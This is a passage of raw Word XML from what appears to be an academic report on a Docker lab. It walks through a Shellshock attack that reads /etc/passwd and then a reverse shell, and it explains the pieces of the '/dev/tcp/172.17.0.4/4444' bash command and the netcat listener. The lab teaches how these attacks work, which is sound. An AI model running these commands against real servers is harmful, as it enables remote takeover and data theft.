          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00045E2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: IP addresses of the running containers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="73A583B3" w14:textId="3F7B2F10" w:rsidR="008A0C5A" w:rsidRDefault="008A0C5A" w:rsidP="008A0C5A">
      <w:r>
        <w:t>The main purpose of th</w:t>
      </w:r>
      <w:r w:rsidR="00206C53">
        <w:t>is attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00206C53">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="009F74AC">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00206C53">
        <w:t>launch shellshock attack on the web server container.</w:t>
      </w:r>
      <w:r w:rsidR="006E241E">
        <w:t xml:space="preserve"> From the above, the application is using an IP address 172.17.0.2</w:t>
      </w:r>
      <w:r w:rsidR="00192E92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A3239B">
        <w:t xml:space="preserve">and is connected to the same LAN </w:t>
      </w:r>
      <w:r w:rsidR="006E3D16">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00A3239B">
        <w:t xml:space="preserve"> the others two containers.</w:t>
      </w:r>
      <w:r w:rsidR="00714563">
        <w:t xml:space="preserve"> Curl and netcat tool</w:t>
      </w:r>
      <w:r w:rsidR="00D55D7B">
        <w:t xml:space="preserve">s are also added on the attacker’s containers. The curl </w:t>
      </w:r>
      <w:r w:rsidR="00515F3D">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005411B7">
        <w:t xml:space="preserve">ol will allow the attackers to </w:t>
      </w:r>
      <w:r w:rsidR="00BE4B9A">
        <w:t>control the fields in an HTTP request</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="72484309"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="006879F9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006879F9">
            <w:instrText xml:space="preserve"> CITATION cur21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="006879F9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[90]</w:t>
          </w:r>
          <w:r w:rsidR="006879F9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AD6DBC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E72660">
        <w:t xml:space="preserve"> The application is vuln</w:t>
      </w:r>
      <w:r w:rsidR="00D07696">
        <w:t>erable so that the attacker used the c</w:t>
      </w:r>
      <w:r w:rsidR="00CF3592">
        <w:t>url command to gain access to the web server container’s /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="004B2183">
        <w:t>, as shown in figure 54.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1F203" w14:textId="7FBDF992" w:rsidR="00567768" w:rsidRDefault="00567768" w:rsidP="00567768">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EFD96B" wp14:editId="35EA7CAE">
            <wp:extent cx="3858895" cy="1435100"/>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862691" cy="1436512"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C587D" w14:textId="46DE43FD" w:rsidR="00477923" w:rsidRDefault="00477923" w:rsidP="007D6CE5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc86858645"/>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>54</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0009610B" w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Accessing the /etc/passwd directory on the web </w:t>
      </w:r>
      <w:r w:rsidR="007D6CE5" w:rsidRPr="007D6CE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>server.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="5374F4FE" w14:textId="48182EF9" w:rsidR="00DC0ABB" w:rsidRDefault="00104199" w:rsidP="00DC0ABB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="001D3CAC">
        <w:t>a reverse shell attack is launched on the vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="00441A8B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE0EFA">
        <w:t xml:space="preserve"> This will enable the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00574D53">
        <w:t>control the victim</w:t>
      </w:r>
      <w:r w:rsidR="00E56562">
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r w:rsidR="00C2208A">
        <w:t xml:space="preserve">input and output </w:t>
      </w:r>
      <w:r w:rsidR="00EA5882">
        <w:t>remotely</w:t>
      </w:r>
      <w:r w:rsidR="00467898">
        <w:t xml:space="preserve"> because the application runs cgi scripts </w:t>
      </w:r>
      <w:r w:rsidR="00BC66B9">
        <w:t xml:space="preserve">exploitable to </w:t>
      </w:r>
      <w:r w:rsidR="00425BBA">
        <w:t>reverse shell.</w:t>
      </w:r>
      <w:r w:rsidR="00C46ACF">
        <w:t xml:space="preserve"> To achieve </w:t>
      </w:r>
      <w:r w:rsidR="00002F2C">
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidR="00EA72C1">
        <w:t xml:space="preserve">attack, the author used </w:t>
      </w:r>
      <w:r w:rsidR="00F56861">
        <w:t>two containers.</w:t>
      </w:r>
      <w:r w:rsidR="00F92D54">
        <w:t xml:space="preserve"> The first container is used to execute</w:t>
      </w:r>
      <w:r w:rsidR="00AF1608">
        <w:t xml:space="preserve"> curl</w:t>
      </w:r>
      <w:r w:rsidR="00F92D54">
        <w:t xml:space="preserve"> script </w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B118E5">
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C678D9">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve"> bash</w:t>
      </w:r>
      <w:r w:rsidR="00C678D9">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C678D9">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="006A7937">
        <w:t>the victim container</w:t>
      </w:r>
      <w:r w:rsidR="005F08D9">
        <w:t>, as shown in figure 55</w:t>
      </w:r>
      <w:r w:rsidR="00796B88">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00485C7A">
        <w:t xml:space="preserve"> While the second container is used to</w:t>
      </w:r>
      <w:r w:rsidR="00076751">
        <w:t xml:space="preserve"> run netcat command </w:t>
      </w:r>
      <w:r w:rsidR="005F08D9">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00076751">
        <w:t xml:space="preserve">wait </w:t>
      </w:r>
      <w:r w:rsidR="001318A9">
        <w:t>for the connection</w:t>
      </w:r>
      <w:r w:rsidR="00485C7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F12C10">
        <w:t>on port 4444</w:t>
      </w:r>
      <w:r w:rsidR="00721CFA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00175744">
        <w:t xml:space="preserve"> The commands used in figure </w:t>
      </w:r>
      <w:r w:rsidR="00BE52DB">
        <w:t>55 are explained below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA97A5" w14:textId="050A3DEE" w:rsidR="001318A9" w:rsidRDefault="00A02B85" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Curl -H “user-agent” </w:t>
      </w:r>
      <w:r w:rsidR="00791DEA">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sends </w:t>
      </w:r>
      <w:r w:rsidR="00574593">
        <w:t>http header</w:t>
      </w:r>
      <w:r w:rsidR="002B2137">
        <w:t xml:space="preserve"> to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D19B856" w14:textId="51748045" w:rsidR="0007125B" w:rsidRDefault="0007125B" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="00E42042">
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:r w:rsidR="00CA2605">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E42042">
        <w:t>invo</w:t>
      </w:r>
      <w:r w:rsidR="00C96B65">
        <w:t>kes the bin/bash shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09137B08" w14:textId="56BEDF97" w:rsidR="00C96B65" w:rsidRDefault="00A3335D" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/bash -i </w:t>
      </w:r>
      <w:r w:rsidR="00CA2605">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">starts the bash </w:t>
      </w:r>
      <w:r w:rsidR="00AC466B">
        <w:t>for interactive mode so that</w:t>
      </w:r>
      <w:r w:rsidR="008A50B7">
        <w:t xml:space="preserve"> it provides shell prompt to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18345DCD" w14:textId="7E0E8CD4" w:rsidR="00C76912" w:rsidRDefault="00BE03B1" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&gt;&amp; /dev/tcp/172.17.0.4/4444</w:t>
      </w:r>
      <w:r w:rsidR="00791DEA">
        <w:t xml:space="preserve"> – redirects </w:t>
      </w:r>
      <w:r w:rsidR="004C3234">
        <w:t>the output of the</w:t>
      </w:r>
      <w:r w:rsidR="00791DEA">
        <w:t xml:space="preserve"> shell to the </w:t>
      </w:r>
      <w:r w:rsidR="004C3234">
        <w:t>172.17.0.4</w:t>
      </w:r>
      <w:r w:rsidR="009D75A3">
        <w:t xml:space="preserve"> (Attacker2</w:t>
      </w:r>
      <w:r w:rsidR="00DC7F9C">
        <w:t xml:space="preserve"> container)</w:t>
      </w:r>
      <w:r w:rsidR="004C3234">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00151CF9">
        <w:t>on port 4444 of TCP connection</w:t>
      </w:r>
      <w:r w:rsidR="00DD1570">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D40FD" w14:textId="0D7D94F1" w:rsidR="00126C48" w:rsidRDefault="00126C48" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidR="006C685C">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="007973BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F26A16">
        <w:t xml:space="preserve">tells the system </w:t>
      </w:r>
      <w:r w:rsidR="00DB3734">
        <w:t xml:space="preserve">to use standard </w:t>
      </w:r>
      <w:r w:rsidR="003C3FDD">
        <w:t>output (1)</w:t>
      </w:r>
      <w:r w:rsidR="00AA60CB">
        <w:t xml:space="preserve"> as standard input (0) from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C7AA88" w14:textId="6FFC0886" w:rsidR="00D44840" w:rsidRDefault="00D649A7" w:rsidP="001318A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidRPr="00A20EB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://172.17.0.2:80/cgi-bin/vulneable</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D44840">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6E36">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B15C6">
        <w:t>the victim’s</w:t>
      </w:r>
      <w:r w:rsidR="00027A14">
        <w:t xml:space="preserve"> container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DFE967" w14:textId="593C61F7" w:rsidR="00027A14" w:rsidRDefault="00E01467" w:rsidP="00027A14">
      <w:r>
        <w:t xml:space="preserve">In a </w:t>
      </w:r>
      <w:r w:rsidR="003B417A">
        <w:t>nutshell, the command ‘bash -I &gt;&amp; /dev/tcp/172.17.0.4/4444 0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="00E87E6D">
        <w:t xml:space="preserve">’ launches a bash shell on the victim’s </w:t>
      </w:r>
      <w:r w:rsidR="00483524">
        <w:t xml:space="preserve">container, </w:t>
      </w:r>
      <w:r w:rsidR="00413E69">
        <w:t>with TCP connection coming from port 4444.</w:t>
      </w:r>
      <w:r w:rsidR="00A226D9">
        <w:t xml:space="preserve"> Thus,</w:t>
      </w:r>
      <w:r w:rsidR="006966E2">
        <w:t xml:space="preserve"> it allows the </w:t>
      </w:r>
      <w:r w:rsidR="00DF4712">
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r w:rsidR="00C07AB6">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00DF4712">
        <w:t xml:space="preserve">connect back to the netcat </w:t>
      </w:r>
      <w:r w:rsidR="00563288">
        <w:t>listener on 172.17.0.4, as shown in figure 56</w:t>
      </w:r>
      <w:r w:rsidR="00C07AB6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AE2DA5">
        <w:t xml:space="preserve"> Now, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="007805F5">
        <w:t xml:space="preserve">managed to connect to the </w:t>
      </w:r>
      <w:r w:rsidR="006C3CE1">
        <w:t>target container and can run any commands</w:t>
      </w:r>
      <w:r w:rsidR="00837FA0">
        <w:t xml:space="preserve"> shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00F748AF">
        <w:t>57</w:t>
      </w:r>
      <w:r w:rsidR="00B15697">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C6E02" w14:textId="36CFCBEA" w:rsidR="0069314B" w:rsidRDefault="00052F03" w:rsidP="00563288">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc86858646"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0321247B" wp14:editId="32894FB5">
            <wp:extent cx="5581650" cy="243648"/>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581650" cy="243648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00175744" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00630B30" w:rsidRPr="0069314B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse shell commands</w:t>
      </w:r>
      <w:r w:rsidR="00563288">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="2BEFAC52" w14:textId="39F5BBCC" w:rsidR="00640F23" w:rsidRDefault="00EF005F" w:rsidP="00EF005F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AED939A" wp14:editId="7477FB6F">
            <wp:extent cx="5340350" cy="639588"/>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340350" cy="639588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23325F4C" w14:textId="2DD81C15" w:rsidR="00EF005F" w:rsidRDefault="00EF005F" w:rsidP="00872EC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc86858647"/>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Netcat listener on </w:t>
      </w:r>
      <w:r w:rsidR="00872EC6" w:rsidRPr="00872EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker2 container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="02FA6B57" w14:textId="1D820A80" w:rsidR="00F155DB" w:rsidRPr="00F155DB" w:rsidRDefault="00B227E9" w:rsidP="00F155DB">
      <w:r>
        <w:t>Figure 57 shows the attacker</w:t>
      </w:r>
      <w:r w:rsidR="001E1DB6">
        <w:t xml:space="preserve"> was able to</w:t>
      </w:r>
      <w:r w:rsidR="00F833CC">
        <w:t xml:space="preserve"> list the files </w:t>
      </w:r>
      <w:r w:rsidR="00F016B3">
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidR="00F833CC">
        <w:t xml:space="preserve"> on the target container remotely</w:t>
      </w:r>
      <w:r w:rsidR="00346D57">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4EE21B" w14:textId="7EC754D5" w:rsidR="00113B36" w:rsidRDefault="00F155DB" w:rsidP="00925D80">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69032FBF" wp14:editId="099CDD39">
            <wp:extent cx="5439590" cy="869950"/>
            <wp:effectExtent l="0" t="0" r="889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43823" cy="870627"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
